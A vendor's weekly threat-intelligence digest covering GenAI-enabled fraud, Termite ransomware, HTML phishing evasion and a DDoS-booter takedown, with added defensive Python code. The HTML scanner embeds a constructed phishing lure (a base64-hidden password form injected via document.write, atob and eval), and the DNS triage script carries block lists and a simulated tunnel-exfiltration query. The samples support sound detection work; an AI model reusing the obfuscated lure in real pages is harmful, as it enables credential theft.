Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
FBI warns of GenAI abuse to create sophisticated social engineering attacks
(TLP: CLEAR) The FBI has issued a warning about the rising use of Generative AI (GenAI) by criminals to execute sophisticated and large-scale fraud schemes with unprecedented credibility. Leveraging AI’s capabilities, cybercriminals are crafting highly convincing social engineering attacks, phishing scams, and fraudulent schemes that are difficult to detect due to the elimination of human errors. These include AI-generated text for believable scams, realistic images for fake profiles and documents, and advanced audio and video manipulation such as voice cloning and deepfake videos. These tactics enable criminals to impersonate loved ones, executives, or public figures, conduct fake video calls, and create fraudulent promotional materials. To counter these threats, the FBI advises adopting protective measures such as using secret verification phrases, scrutinizing AI-generated content for imperfections, limiting the sharing of personal media online, and independently verifying the identity of unknown contacts. The public is urged to stay vigilant against these evolving AI-enhanced cyber threats.
(TLP: CLEAR) Comments: Malicious actors have increasingly leveraged artificial intelligence (AI) over the past few years to enhance the scale, sophistication, and success of their attacks. AI-powered tools automate reconnaissance activities such as identifying potential vulnerabilities in systems and networks, and personalize phishing emails through natural language models. AI tools can also rapidly analyse large datasets to craft highly convincing social engineering campaigns or to bypass security measures such as spam filters and anomaly detection systems. Malicious actors also use AI to deploy evasive malware that adapts its behaviour to avoid detection by learning from the response of security measures.
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION
Control:
- Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
- Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
- Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
- Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”
NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses for both users and machines using defined categories, including botnet Command and Control (C2), as well as machine learning to detect previously uncategorized malicious associations, helping to prevent data exfiltration and malware detonation.
Source: https://cybersecuritynews.com/fbi-warns-of-genai-abuse/
Unmasking Termite, the ransomware gang claiming the Blue Yonder attack
(TLP: CLEAR) The Termite ransomware group has claimed responsibility for a November 2024 attack on supplier Blue Yonder, impacting companies like Starbucks, Sainsbury’s, and Morrisons. The group alleges it stole 680GB of data, including 16,000 email lists and 200,000 insurance documents, and has previously targeted organizations in various sectors across Europe and North America. Cyber analysts suggest Termite may be a rebranding of the Babuk ransomware group, given similarities in tactics and branding. Termite employs advanced techniques to delay shutdown termination, disable services, prevent recovery, and encrypt files with a “.termite” extension. Experts recommend measures such as verifying email links, conducting offline data backups, enabling automatic software updates, and using robust security software to mitigate such threats.
(TLP: CLEAR) Comments: The Termite ransomware group first emerged in late 2024 and has rapidly established itself as a significant cyber threat by targeting organizations across various industries in multiple countries. The rebranding of the Babuk ransomware group as the Termite ransomware group might be due to members leaving the original group while continuing to use the same infrastructure as the original group. The Babuk ransomware group first emerged in early 2021 and was known for conducting double extortion on its victims: not only encrypting the victim’s data but also exfiltrating sensitive data and threatening to publish it if the ransom was not paid. In 2021 the Babuk ransomware group attacked the Washington D.C. Metropolitan Police Department, but shortly after this attack they stated they would transition to a Ransomware-as-a-Service (RaaS) model and would allow other malicious actors to use their malware in exchange for a share of the ransom payments.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events.” One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports four distinct detection engines to provide Defense in Depth against malware, phishing, and other abuses:
- The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
- The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one click of a button.
- The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
- The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.
Source: https://www.infosecurity-magazine.com/news/termite-ransomware-blue-yonder/
Hackers exploiting HTML functions to bypass email security filters
(TLP: CLEAR) Cybercriminals are increasingly exploiting advanced HTML techniques to bypass email security filters, elevating the risks of phishing attacks for individuals and organizations. These attacks often involve HTML attachments disguised as legitimate documents like invoices or HR policies, embedding malicious JavaScript that redirects users to phishing sites or steals credentials. A prevalent tactic is JavaScript obfuscation, which conceals malicious code within the HTML, making detection challenging for security systems. Attackers also use outdated JavaScript methods, Unicode tricks, and content encoding techniques like Base64 to evade detection. Dynamic content injection, where phishing forms are added after user interaction, further complicates detection efforts.
The use of AI tools like ChatGPT has enabled attackers to create highly convincing phishing content with minimal effort, exacerbating the threat landscape. Meanwhile, phishing kits and templates, easily accessible on the dark web for as little as $3-$40, have lowered the barrier to entry for such attacks. Reports indicate a 45% rise in spear-phishing and social engineering attacks, with nearly 65% of known cyber threat groups employing these tactics. To combat these evolving threats, organizations must invest in advanced security solutions capable of detecting obfuscated HTML content and adopt proactive measures to safeguard against these increasingly sophisticated phishing schemes.
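The evasion techniques summarized above (inline JavaScript that unpacks Base64, `unescape`/`atob`/`eval` chains, `document.write` injection of a credential form) leave recognizable traces in the attachment itself. The following Python scanner is an added example written for this report; it is not code from the cited article or from Vercara. It parses an HTML attachment, extracts inline script bodies, and scores the indicators named in the story. The sample "invoice" it scans is constructed inline, and the `example.invalid` URL in it is a placeholder, not a real phishing site.

```python
import base64
import re
from html.parser import HTMLParser

# Calls that invoices and HR policy documents rarely need, but that obfuscated
# HTML droppers use to unpack and run hidden code at open time.
SUSPICIOUS_CALLS = (
    "eval(", "atob(", "unescape(", "document.write(",
    "String.fromCharCode(", "Function(",
)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
UNICODE_ESCAPE = re.compile(r"\\u[0-9a-fA-F]{4}|\\x[0-9a-fA-F]{2}")
# Markers that, when found inside a decoded blob, mean the blob is hidden markup.
DECODED_MARKERS = ("<form", "password", "<script", "http://", "https://")


class _Collector(HTMLParser):
    """Collect inline <script> bodies and count literal password inputs."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "input" and dict(attrs).get("type", "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> content through as raw data (CDATA).
        if self.in_script:
            self.scripts.append(data)


def analyze_html(html):
    """Return (score, findings) for an HTML attachment; higher means more suspicious."""
    c = _Collector()
    c.feed(html)
    findings = []
    js = "\n".join(c.scripts)
    for call in SUSPICIOUS_CALLS:
        if call in js:
            findings.append(f"script uses {call[:-1]}")
    if len(UNICODE_ESCAPE.findall(js)) >= 8:
        findings.append("heavy unicode/hex escaping in script")
    for blob in BASE64_BLOB.findall(js):
        try:
            padded = blob + "=" * (-len(blob) % 4)
            decoded = base64.b64decode(padded).decode("utf-8", "ignore")
        except Exception:
            continue  # not valid base64; ignore this run of characters
        hits = [m for m in DECODED_MARKERS if m in decoded.lower()]
        if hits:
            findings.append(f"base64 blob decodes to markup ({', '.join(hits)})")
    if c.password_inputs:
        findings.append("literal password input (credential form)")
    return len(findings), findings


# Constructed lure resembling the attachments described above (hypothetical,
# not a real sample). The form is hidden in base64 and injected at open time.
LURE_FORM = (b'<form action="https://example.invalid/login">'
             b'<input type="password" name="pw"></form>')
SAMPLE_HTML = (
    "<html><body><h1>Invoice #10422</h1><script>"
    'var p = "' + base64.b64encode(LURE_FORM).decode() + '";'
    "document.write(unescape(atob(p)));"
    "eval(String.fromCharCode(97,108,101,114,116));"
    "</script></body></html>"
)
BENIGN_HTML = "<html><body><p>Hello, please see the attached agenda.</p></body></html>"

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        score, findings = analyze_html(doc)
        print(name, score, findings)
```

The scanner deliberately does not execute any script; it only decodes Base64 runs statically and checks what they contain, so it is safe to run on untrusted attachments in a mail gateway or sandbox pre-filter. A production filter would add a threshold and feed the findings into the verdict alongside sender reputation and URL checks.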
(TLP: CLEAR) Comments: It is highly advised that organizations have a robust and continuous cybersecurity training program that teaches their employees how to identify malicious emails and other social engineering attacks.
(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.
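The detection layers mentioned in this item and in the UltraDDR engine list above (block lists for domains and CIDR blocks, plus heuristics for domain generation algorithms and DNS tunneling) can be illustrated with a small triage script over resolver logs. The following Python is an added example written for this report; it is not UltraDDR code and does not reflect how Vercara's engines are implemented. The block list entries, the query log lines, and the thresholds (label length 40, entropy 3.5) are all constructed for illustration; the IP addresses come from the RFC 5737 documentation ranges.

```python
import base64
import ipaddress
import math

# Constructed block list (hypothetical entries, not threat intelligence).
BLOCKLIST_DOMAINS = {"evil.example", "c2.invalid"}
BLOCKLIST_NETS = [ipaddress.ip_network("203.0.113.0/24")]  # TEST-NET-3, constructed


def domain_blocked(fqdn, blocked):
    """Exact or parent-domain match: 'a.b.evil.example' matches 'evil.example'."""
    name = fqdn.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in blocked)


def answer_blocked(ip, nets):
    """CIDR match on the address a query resolved to."""
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def shannon_entropy(s):
    """Bits of entropy per character; random-looking labels score high."""
    if not s:
        return 0.0
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_dga(fqdn):
    """Coarse DGA heuristic: a long, high-entropy second-level label."""
    labels = fqdn.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return False
    sld = labels[-2]
    return len(sld) >= 12 and shannon_entropy(sld) >= 3.5


def looks_tunnel(fqdn):
    """Tunneling heuristic: an oversized label or an unusually long query name."""
    labels = fqdn.rstrip(".").split(".")
    return max(len(label) for label in labels) >= 40 or len(fqdn) > 120


def classify(fqdn, answer_ip=None):
    """Order matters: explicit lists first, then the behavioural heuristics."""
    if domain_blocked(fqdn, BLOCKLIST_DOMAINS):
        return "block:list"
    if answer_ip and answer_blocked(answer_ip, BLOCKLIST_NETS):
        return "block:answer"
    if looks_tunnel(fqdn):
        return "alert:tunnel"
    if looks_dga(fqdn):
        return "alert:dga"
    return "allow"


# Constructed resolver log: "timestamp client qtype qname [answer]". Not real traffic.
# The tunnel label is base32-encoded data, the encoding DNS tunnels commonly use.
TUNNEL_LABEL = base64.b32encode(b"constructed exfil chunk 01").decode().rstrip("=").lower()
QUERY_LOG = [
    "2024-12-12T10:01:02Z 10.0.0.5 A www.example.com 192.0.2.10",
    "2024-12-12T10:01:03Z 10.0.0.5 A login.evil.example 198.51.100.7",
    "2024-12-12T10:01:04Z 10.0.0.9 A update.example.net 203.0.113.9",
    "2024-12-12T10:01:05Z 10.0.0.9 A xk9f2qz7vb3lp1wd.net 198.51.100.8",
    f"2024-12-12T10:01:06Z 10.0.0.9 TXT {TUNNEL_LABEL}.t.example",
]


def triage(lines):
    """Return (qname, verdict) for each log line."""
    out = []
    for line in lines:
        parts = line.split()
        qname = parts[3]
        answer = parts[4] if len(parts) > 4 else None
        out.append((qname, classify(qname, answer)))
    return out


if __name__ == "__main__":
    for qname, verdict in triage(QUERY_LOG):
        print(f"{verdict:14} {qname}")
```

Two points worth noting from the design: the answer-address check catches a benign-looking hostname that resolves into known adversarial infrastructure, which a name-only list misses, and the entropy heuristic is intentionally coarse (long dictionary-word domains can approach the threshold), which is why a production Protective DNS service pairs such heuristics with curated feeds and allow lists rather than relying on them alone.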
Source: https://cybersecuritynews.com/html-functions-exploited-to-bypass-email-security-filters/
Operation PowerOFF takes down DDoS boosters
(TLP: CLEAR) Law enforcement agencies from 15 countries have successfully dismantled 27 DDoS-for-hire services, arrested three platform administrators, and identified 300 users of these services as part of Operation PowerOFF, a global initiative targeting cybercrime, specifically distributed denial-of-service (DDoS) attacks. These services, known as “booters” or “stressers,” enable paying customers to launch DDoS attacks using botnets on compromised devices, causing service disruptions, particularly during critical periods like the holiday shopping season. Coordinated by Europol, this operation involved analytical support, crypto-tracing, and forensic investigations, leading to the seizure of major booter websites such as zdstresser.net and orbitalstress.net, which now display seizure notices.
In addition to platform takedowns, law enforcement efforts in the Netherlands led to the arrest of four individuals, one linked to over 4,000 DDoS attacks. Approximately 200 Dutch users of these services have been identified, with many receiving warnings or facing prosecution. In the U.S., the Department of Justice indicted individuals connected to booter services, including Ricardo Cesar Colli, a.k.a. “TotemanGames,” who operated Securityhide.net. The crackdown follows earlier successes under Operation PowerOFF, such as the July 2024 shutdown of DigitalStress by the UK’s National Crime Agency. This comprehensive operation demonstrates the global effort to combat the growing threat of DDoS-for-hire services.
(TLP: CLEAR) Comments: Focusing on such takedowns often yields only short-term effects, as malicious actors are likely to recreate their infrastructure or switch to backup platforms. However, the arrest of individuals involved in operating these services represents a significant win for law enforcement. Unlike the relatively quick recreation of infrastructure, the process of rebuilding organizational and operational capacity takes considerably longer after key arrests. This delay can significantly disrupt the actors’ ability to resume operations. Furthermore, law enforcement strategically conducts these operations around critical events, such as holiday seasons, major sporting events, or elections. The goal is to disrupt malicious actors’ operations during these periods when DDoS attacks can have the most significant impact.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.DS-02: “The confidentiality, integrity, and availability of data-in-transit are protected.” Organizations should have a well-defined incident response plan in place that outlines the procedures to take in a DDoS attack, including communication protocols and escalation procedures. Additionally, organizations should utilize DDoS mitigation services from reputable providers that detect and mitigate attacks in real time, such as Vercara’s UltraDDoS Protect.
(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets, whether they reside in the cloud, multi-cloud, data center, or hybrid. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks can be mitigated within seconds.
About Vercara.
The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.
To learn more about Vercara solutions, please contact us.